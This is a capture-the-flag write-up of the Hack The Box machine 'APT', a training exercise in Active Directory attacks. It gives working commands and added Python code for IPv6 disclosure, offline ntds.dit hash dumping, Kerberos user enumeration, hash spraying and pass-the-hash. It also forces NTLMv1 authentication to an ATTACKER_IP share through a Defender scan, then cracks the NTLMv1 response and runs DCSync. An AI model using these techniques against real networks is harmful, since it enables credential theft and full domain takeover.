Introduction to HackTheBox APT
In this article we cover a range of Active Directory penetration-testing techniques by working through the retired Hack The Box machine “APT”, which is rated Insane. The attack chain involves:
✅ Enumerating MSRPC and SMB
✅ Extracting Active Directory hashes
✅ Performing Kerberos attacks
✅ Exploiting NTLM leaks
✅ Gaining administrator access
HackTheBox APT Description
APT is an Insane-difficulty Windows machine where only RPC and HTTP services are exposed. Enumeration of the existing RPC interfaces provides an interesting object that can be used to disclose the host's IPv6 address. The box turns out to be protected by a firewall with an exemption that, over IPv6, gives access to a backup share. User enumeration and brute-force attacks give access to the registry, which contains login credentials. The machine is configured to allow authentication via the NTLMv1 protocol, which can be leveraged to gain system access.
Walkthrough
1️⃣ Enumerating Microsoft RPC (MSRPC) on Port 135
MSRPC (Microsoft Remote Procedure Call) is the transport behind most Windows remote-management services, and the endpoint mapper on TCP 135 lists its registered interfaces to anyone, no credentials needed.
Using Impacket's rpcmap.py to list the available endpoint mappings and interfaces.
Among them is the DCOM IObjectExporter (OXID resolver) interface, whose ServerAlive2 call returns the host's string bindings: the host name plus every IPv4 and IPv6 address it listens on. The output reveals the machine's IPv6 address, which becomes the target for the rest of the attack, because the firewall rules that hide SMB on IPv4 do not apply there.
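The disclosure step above in code. This is an added example written for this article, not a script from the box or from Impacket; it calls Impacket's IObjectExporter.ServerAlive2() and then filters the returned bindings. The sample binding list and the addresses in it are constructed.

```python
"""Disclose a host's IPv6 address via the DCOM IObjectExporter interface.

Added example, not code from the original article. server_alive2() makes the
same RPC call that Impacket exposes as IObjectExporter.ServerAlive2();
usable_ipv6() is a pure-Python filter over the returned bindings so it can be
tried offline. The sample bindings below are constructed, not from the box.
"""
import ipaddress
import sys


def usable_ipv6(bindings):
    """Return the routable IPv6 addresses among the host's string bindings.

    ServerAlive2 returns a mix of the host name, IPv4 and IPv6 addresses.
    Link-local addresses are skipped: they need a zone index and are not
    reachable through a router, so they are useless as a scan target.
    """
    found = []
    for addr in bindings:
        try:
            ip = ipaddress.ip_address(addr.rstrip('\x00'))
        except ValueError:
            continue  # host name or other non-address binding
        if ip.version == 6 and not ip.is_link_local and str(ip) not in found:
            found.append(str(ip))
    return found


def server_alive2(target, port=135):
    """Ask the OXID resolver on the endpoint-mapper port for its bindings.

    The call is served before any authentication, which is why a host whose
    IPv4 firewall hides everything else still hands out its addresses.
    """
    from impacket.dcerpc.v5 import transport
    from impacket.dcerpc.v5.dcomrt import IObjectExporter

    rpc = transport.DCERPCTransportFactory('ncacn_ip_tcp:%s[%d]' % (target, port))
    dce = rpc.get_dce_rpc()
    dce.connect()
    try:
        bindings = IObjectExporter(dce).ServerAlive2()
    finally:
        dce.disconnect()
    return [b['aNetworkAddr'] for b in bindings]


# Constructed sample of what ServerAlive2 typically returns.
SAMPLE_BINDINGS = ['apt', '192.0.2.10', '2001:db8::a1', 'fe80::1', '2001:db8::a1']


if __name__ == '__main__':
    # Usage: python3 oxid_ipv6.py <target-ipv4>; without an argument the sample is used.
    bindings = server_alive2(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_BINDINGS
    for addr in usable_ipv6(bindings):
        print(addr)
```

Once an address comes back, repeat the port scan against it (nmap -6) before touching SMB: the whole point of the step is that the IPv6 side of the host is filtered differently from the IPv4 side.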
2️⃣ SMB Enumeration & Extracting the Active Directory Database
Scanning the SMB shares on port 445 with smbclient, over the IPv6 address found above, since the port is filtered on IPv4.
Finding and downloading backup.zip, which contains:
🔹 ntds.dit (the Active Directory database)
🔹 SYSTEM (the registry hive holding the boot key that encrypts the secrets in ntds.dit)
Cracking the zip password with john:
zip2john backup.zip > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
- Password found: "iloveyousomuch"
Extracting the user hashes from the offline copy of the database. LOCAL tells secretsdump.py to decrypt the files on disk instead of talking to a domain controller; the output lands in hashes.ntds (add -history to include password-history entries, since an old backup may still hold a valid password there):
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -outputfile hashes
This provides usernames and NT hashes. Because the archive is a backup, the hashes may be older than the accounts' current passwords, which shapes the next two steps.
3️⃣ Identifying Active Users with Kerberos
Using kerbrute to check which of the dumped usernames still exist. The KDC answers an AS-REQ for an unknown principal with a distinct error (KDC_ERR_C_PRINCIPAL_UNKNOWN), so this enumerates accounts without generating failed logons. The domain name must resolve to the IPv6 address (an /etc/hosts entry is enough):
kerbrute userenum -d apt.http.local --dc apt.http.local users.txt
- This identifies “Henry Vincent” as an active user.
Testing the extracted hashes for that user with crackmapexec:
crackmapexec smb apt.http.local -u henry -H hashes.txt
The login fails: the dump comes from a backup, so the hash listed next to the user's name need not be the current one. The next step is to try every hash in the dump for this user, against Kerberos rather than SMB, stopping as soon as the KDC accepts one.
4️⃣ Exploiting Kerberos Authentication
Using getTGT.py to request a Kerberos Ticket Granting Ticket (TGT) with a candidate hash, repeated for each hash in the dump until one is accepted:
getTGT.py -hashes LMHASH:NTHASH apt.http.local/henry
A ticket comes back only when the hash is the account's current one: with a wrong hash the KDC rejects the AS-REQ pre-authentication with KDC_ERR_PREAUTH_FAILED. Each rejection still counts as a bad password attempt, so check the lockout policy before spraying a large dump at a single account.
getTGT.py saves the ticket as henry.ccache; point the Kerberos-aware Impacket tools at it:
export KRB5CCNAME=henry.ccache
Reading the user's registry remotely with reg.py, authenticating with the ticket (-k -no-pass) instead of the hash:
reg.py -k -no-pass apt.http.local/henry@apt.http.local query -keyName HKCU\Software -s
The recursive listing (-s) turns up a plaintext password for an admin account, stored under an application's key. 🔥
5️⃣ Gaining Initial Access with Evil-WinRM
Logging in using Evil-WinRM:
evil-winrm -i apt.http.local -u henry -p [plaintext-password]
First shell obtained! 🎉
6️⃣ Privilege Escalation – NTLM Hash Leak
Checking the PowerShell history of the account for leftover administration commands:
cat C:\Users\henry\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
- The history shows the NTLM authentication settings being changed: the LAN Manager authentication level (LmCompatibilityLevel) was lowered, so the host will still answer an NTLM challenge with an NTLMv1 response instead of NTLMv2 only.
- That is what makes the leak valuable. An NTLMv1 response is three DES encryptions of the server's 8-byte challenge, keyed directly with pieces of the NT hash, so a captured response can be cracked back to the NT hash itself. NTLMv2 mixes in a client nonce and an HMAC, and a capture then yields a password only after a wordlist attack.
Forcing an outbound NTLM authentication through a Windows Defender scan:
- Start a listener on the attacking machine that records the challenge-response. The article uses Impacket's smbserver.py:
sudo smbserver.py share /tmp -smb2support
- To obtain an NTLMv1 response against the fixed challenge 1122334455667788 that offline lookup tables expect, run Responder instead, with --lm (request the downgraded response) and --disable-ess (refuse Extended Session Security, which would change the value the client encrypts). Responder's default challenge is already 1122334455667788.
- Trigger a scan of a file on that share from the target. Defender has to open the file, and opening a UNC path means authenticating to the attacker's server:
& "C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File \\ATTACKER_IP\share\test.txt
- The listener captures an NTLMv1 challenge-response. The scan is carried out by the Defender service, which runs as SYSTEM, so the authentication comes from the host's computer account rather than from the logged-on user. On a domain controller that account holds the directory-replication rights that the DCSync in the next step relies on.
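What the capture looks like and why NTLMv1 is the weak point, as an added example (not code from the article, from Responder or from Impacket). It parses the capture line, detects Extended Session Security from the LM field, computes the value the client actually DES-encrypted, and splits the NT response into the three DES blocks a cracker recovers the NT hash from. The capture lines are constructed with fake responses.

```python
"""Inspect a captured NetNTLMv1 challenge-response before cracking it.

Added example, not code from the original article. It parses the
'user::domain:lmresp:ntresp:challenge' line that Responder and Impacket's
smbserver.py print, works out the 8-byte value the client DES-encrypted
(which differs when Extended Session Security is negotiated), and tells
whether a fixed-challenge lookup will return the NT hash. The capture lines
at the bottom are constructed, not from the box.
"""
import hashlib

FIXED_CHALLENGE = '1122334455667788'   # Responder's default server challenge


def parse_netntlmv1(line):
    """Split a capture line into its fields. Lengths are checked so an NTLMv2
    line (variable-length NT response) is rejected instead of mis-parsed."""
    parts = line.strip().split(':')
    if len(parts) != 6:
        raise ValueError('expected user::domain:lmresp:ntresp:challenge')
    user, _, domain, lmresp, ntresp, challenge = parts
    if len(lmresp) != 48 or len(ntresp) != 48 or len(challenge) != 16:
        raise ValueError('not NTLMv1: responses must be 24 bytes, challenge 8')
    return {'user': user, 'domain': domain, 'lmresp': lmresp.lower(),
            'ntresp': ntresp.lower(), 'challenge': challenge.lower()}


def ess_used(cap):
    """With ESS (NTLM2 session response) the LM field carries an 8-byte client
    nonce followed by 16 zero bytes instead of a real LM response."""
    return cap['lmresp'][16:] == '0' * 32


def des_plaintext(cap):
    """The 8 bytes each DES block encrypts: the server challenge, or under ESS
    the first 8 bytes of MD5(server challenge || client nonce)."""
    if not ess_used(cap):
        return cap['challenge']
    server = bytes.fromhex(cap['challenge'])
    client = bytes.fromhex(cap['lmresp'][:16])
    return hashlib.md5(server + client).digest()[:8].hex()


def des_pairs(cap):
    """(ciphertext, plaintext) pairs for the three DES blocks of the NT response.

    Key 1 = NT hash bytes 0-6, key 2 = bytes 7-13, key 3 = bytes 14-15 plus
    five zero bytes. Recovering all three keys by exhaustive DES search gives
    the NT hash itself; no password guessing is involved.
    """
    pt = des_plaintext(cap)
    nt = cap['ntresp']
    return [(nt[0:16], pt), (nt[16:32], pt), (nt[32:48], pt)]


def lookup_table_works(cap):
    """A precomputed table covers exactly one plaintext: the fixed challenge
    with no ESS. Otherwise the keys still fall to brute force, just not instantly."""
    return not ess_used(cap) and cap['challenge'] == FIXED_CHALLENGE


# Constructed captures with fake response bytes. The first is the shape Responder
# with --lm and --disable-ess produces; the second negotiated ESS.
PLAIN_CAPTURE = ('DC01$::LAB:'
                 '0123456789abcdef0123456789abcdef0123456789abcdef:'
                 'fedcba9876543210fedcba9876543210fedcba9876543210:'
                 '1122334455667788')
ESS_CAPTURE = ('DC01$::LAB:'
               'a0a1a2a3a4a5a6a7' + '0' * 32 + ':'
               'fedcba9876543210fedcba9876543210fedcba9876543210:'
               '1122334455667788')


if __name__ == '__main__':
    for line in (PLAIN_CAPTURE, ESS_CAPTURE):
        cap = parse_netntlmv1(line)
        print(cap['user'], 'ESS' if ess_used(cap) else 'no ESS',
              'table lookup' if lookup_table_works(cap) else 'DES brute force',
              des_pairs(cap))
```

When ess_used() is true the fixed-challenge lookup route is closed, but the (ciphertext, plaintext) pairs still go straight into a DES key-recovery attack (hashcat mode 14000); the third pair has only 65,536 candidate keys and falls instantly, the first two take a full DES search each. Either way the result is the NT hash, which is why a single coerced NTLMv1 authentication from a domain controller is enough for the next step.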
7️⃣ Cracking the NTLMv1 Response & DCSync Attack
- Cracking the captured response offline (the article uses CrackStation). Because the exchange was NTLMv1, the crack yields the account's NT hash directly, and that is enough for pass-the-hash; no plaintext password is needed.
- Using secretsdump.py for a DCSync attack, i.e. asking the domain controller to replicate every account's secrets over the DRSUAPI interface, which it does for any principal holding replication rights. ACCOUNT is the account whose hash was captured in the previous step; LMHASH can be left empty (-hashes :NTHASH):
secretsdump.py -just-dc -hashes LMHASH:NTHASH apt.http.local/ACCOUNT@apt.http.local
- This dumps the NT hashes of all Active Directory accounts, including Administrator.
Logging in as Administrator by passing the hash:
evil-winrm -i apt.http.local -u Administrator -H ADMIN_NTLM_HASH
Root access achieved! 🎉🎉
Key Takeaways
✅ MSRPC enumeration can reveal network interfaces & IPv6 targets.
✅ Backup files often store sensitive data (Active Directory hashes, registry keys, etc.).
✅ NTLM misconfigurations (here, allowing NTLMv1 responses) turn a single captured authentication into a reusable NT hash.
✅ Responder + Windows Defender scan can capture NTLM hashes remotely.
✅ DCSync allows full Active Directory takeover once the hash of any account with replication rights (a Domain Admin or a domain controller's computer account) is obtained.